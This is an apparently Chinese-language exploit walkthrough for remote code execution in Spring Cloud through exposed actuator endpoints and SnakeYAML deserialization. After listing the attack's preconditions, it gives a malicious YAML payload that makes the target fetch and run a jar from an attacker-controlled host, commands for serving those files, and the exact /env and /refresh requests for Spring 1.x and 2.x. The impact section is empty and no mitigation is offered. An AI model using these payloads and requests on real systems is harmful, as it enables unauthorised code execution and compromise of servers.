Spring Cloud SnakeYAML RCE
==========================

一、漏洞简介
------------

#### 利用条件：

-   可以 POST 请求目标网站的 `/env` 接口设置属性
-   可以 POST 请求目标网站的 `/refresh` 接口刷新配置（存在
    `spring-boot-starter-actuator` 依赖）
-   目标依赖的 `spring-cloud-starter` 版本 \< 1.3.0.RELEASE
-   目标可以请求攻击者的 HTTP 服务器（请求可出外网）

二、漏洞影响
------------

三、复现过程
------------

#### 漏洞分析：

1.  spring.cloud.bootstrap.location 属性被设置为外部恶意 yml 文件 URL
    地址
2.  refresh 触发目标机器请求远程 HTTP 服务器上的 yml 文件，获得其内容
3.  SnakeYAML 由于存在反序列化漏洞，所以解析恶意 yml
    内容时会完成指定的动作
4.  先是触发 java.net.URL 去拉取远程 HTTP 服务器上的恶意 jar 文件
5.  然后是寻找 jar 文件中实现 javax.script.ScriptEngineFactory
    接口的类并实例化
6.  实例化类时执行恶意代码，造成 RCE 漏洞

### 漏洞复现

##### 步骤一： 托管 yml 和 jar 文件

在自己控制的 vps 机器上开启一个简单 HTTP 服务器，端口尽量使用常见 HTTP
服务端口（80、443）

    # 使用 python 快速开启 http server

    python2 -m SimpleHTTPServer 80
    python3 -m http.server 80

在网站根目录下放置后缀为 `yml` 的文件 `example.yml`，内容如下：

    !!javax.script.ScriptEngineManager [
      !!java.net.URLClassLoader [[
        !!java.net.URL ["http://your-vps-ip/example.jar"]
      ]]
    ]

在网站根目录下放置后缀为 `jar` 的文件
`example.jar`，内容是要执行的代码，代码编写及编译方式参考 yaml-payload

    https://github.com/artsploit/yaml-payload

##### 步骤二： 设置 spring.cloud.bootstrap.location 属性

spring 1.x

    POST /env
    Content-Type: application/x-www-form-urlencoded

    spring.cloud.bootstrap.location=http://your-vps-ip/example.yml

spring 2.x

    POST /actuator/env
    Content-Type: application/json

    {"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/example.yml"}

##### 步骤三： 刷新配置

spring 1.x

    POST /refresh
    Content-Type: application/x-www-form-urlencoded

spring 2.x

    POST /actuator/refresh
    Content-Type: application/json